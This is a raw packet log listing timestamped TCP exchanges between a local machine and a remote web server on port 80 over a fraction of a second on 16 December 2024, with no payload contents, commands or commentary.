                                                                              Dec 16, 2024 17:30:29.695637941 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.695708036 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.697031975 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.697103024 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.697455883 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.697519064 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.700421095 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.700499058 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.700889111 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.700949907 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.703849077 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.703933954 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.704252958 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.704351902 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.707319021 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.707376003 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.707720041 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.707777977 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.710735083 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.710805893 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.711157084 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.711231947 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.713871956 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.713936090 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.714272976 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.714330912 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.717024088 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.717087984 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.717401981 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.717458010 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.720130920 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.720197916 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.720532894 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.720592976 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.723128080 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.723195076 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.723649025 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.723710060 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.726162910 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.726233006 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.726527929 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.726587057 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.729137897 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.729276896 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.729528904 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.729588032 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.731962919 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.732028961 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.732436895 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.732492924 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.734821081 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.734906912 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.735209942 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.735270977 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.737785101 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.737848997 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.738188982 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.738240957 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.740438938 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.740539074 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.741010904 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.741066933 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.743099928 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.743165016 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.743608952 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.743669033 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.745888948 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.745949984 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.746412992 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.746469021 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.748714924 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.748837948 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.749023914 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.749075890 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.751188993 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.751247883 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.751616001 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.751677036 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.754019022 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.754086971 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.754291058 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.754348040 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.756465912 CET8049730192.3.179.166192.168.2.4
Dec 16, 2024 17:30:29.756529093 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.756983042 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.757040977 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.759183884 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.759249926 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.759572983 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.759634018 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.761686087 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.761748075 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.762077093 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.762132883 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.763309956 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.763381958 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.763732910 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.763817072 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.764991999 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.765048981 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.765366077 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.765422106 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.766602993 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.766663074 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.766995907 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.767050028 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.768235922 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.768328905 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.768649101 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.768703938 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.770009995 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.770066977 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.770313978 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.770369053 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.771661997 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.771723032 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.771970987 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.772033930 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.773226023 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.773303986 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.773590088 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.773649931 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.774998903 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.775075912 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.775342941 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.775405884 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.776557922 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.776633024 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.776971102 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.777036905 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.778162003 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.778237104 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.778876066 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.778939962 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.779859066 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.779927015 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.780246973 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.780303001 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.781467915 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.781527042 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.781900883 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.781968117 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.783138990 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.783200026 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.783495903 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.783549070 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.785021067 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.785079002 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.785176992 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.785228968 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.786612988 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.786690950 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.787092924 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.787162066 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.788151026 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.788233995 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.788499117 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.788605928 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.789750099 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.789822102 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.790218115 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.790276051 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.791376114 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.791444063 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.791815996 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.791876078 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.793121099 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.793180943 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.793610096 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.793667078 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.794665098 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.794733047 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.795140982 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.795196056 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.796363115 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.796423912 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.796847105 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.796900988 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.798011065 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.798105955 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.798455000 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.798507929 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.799700975 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.799763918 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.800092936 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.800138950 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.801357031 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.801429033 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.801701069 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.801800013 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.803015947 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.803076982 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.803388119 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.803467035 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.804658890 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.804725885 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.805046082 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.805105925 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.806225061 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.806293964 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.806627989 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.806683064 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.815481901 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.815592051 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.816747904 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.816792011 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.816823959 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.816848993 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.817384005 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.817457914 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.887928963 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.888005972 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.888150930 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.888197899 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.888971090 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.889022112 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.889803886 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.889859915 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.890475035 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.890604973 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.891024113 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.891079903 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.891901016 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.891963005 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.892616987 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.892666101 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.893405914 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.893459082 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.894171000 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.894228935 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.894972086 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.895023108 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.895823002 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.895874023 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.896578074 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.896625042 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.897458076 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.897516012 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.898109913 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.898166895 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.899024010 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.899071932 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.899691105 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.899745941 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.900451899 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.900501013 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.901249886 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.901299000 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.902271032 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.902328014 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.902827024 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.902874947 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.903669119 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.903707027 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.903733969 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.903747082 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.905250072 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.905318975 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.906023026 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.906085968 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.906934977 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.906969070 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.907007933 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.907027006 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.908425093 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.908473969 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.909194946 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.909255981 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.909969091 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.910003901 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.910022974 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.910053015 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.912425995 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.912460089 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.912498951 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.912523031 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.914505959 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.914540052 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.914568901 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.914591074 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.915457964 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.915494919 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.915512085 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.915541887 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.916924953 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.916960955 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.916980028 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.916999102 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.917900085 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.917934895 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.917947054 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.917979956 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.919563055 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.919598103 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.919629097 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.919645071 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.921109915 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.921144009 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.921163082 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.921188116 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.924849033 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.924884081 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.924915075 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.924918890 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.924941063 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.924954891 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.924966097 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.924998045 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.926378965 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.926431894 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.926584005 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.926630020 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.928098917 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.928133011 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.928138971 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.928184986 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.929577112 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.929613113 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.929634094 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.929656982 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.931263924 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.931298971 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.931323051 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.931346893 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.932817936 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.932852030 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.932876110 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.932890892 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.934403896 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.934438944 CET  80     49730  192.3.179.166  192.168.2.4
Dec 16, 2024 17:30:29.934453011 CET  49730  80     192.168.2.4    192.3.179.166
Dec 16, 2024 17:30:29.934484005 CET  49730  80     192.168.2.4    192.3.179.166
                                                                              Dec 16, 2024 17:30:29.936192036 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.936228037 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.936259985 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.936269999 CET4973080192.168.2.4192.3.179.166
                                                                              Dec 16, 2024 17:30:29.938141108 CET8049730192.3.179.166192.168.2.4
                                                                              Dec 16, 2024 17:30:29.938175917 CET8049730192.3.179.166192.168.2.4
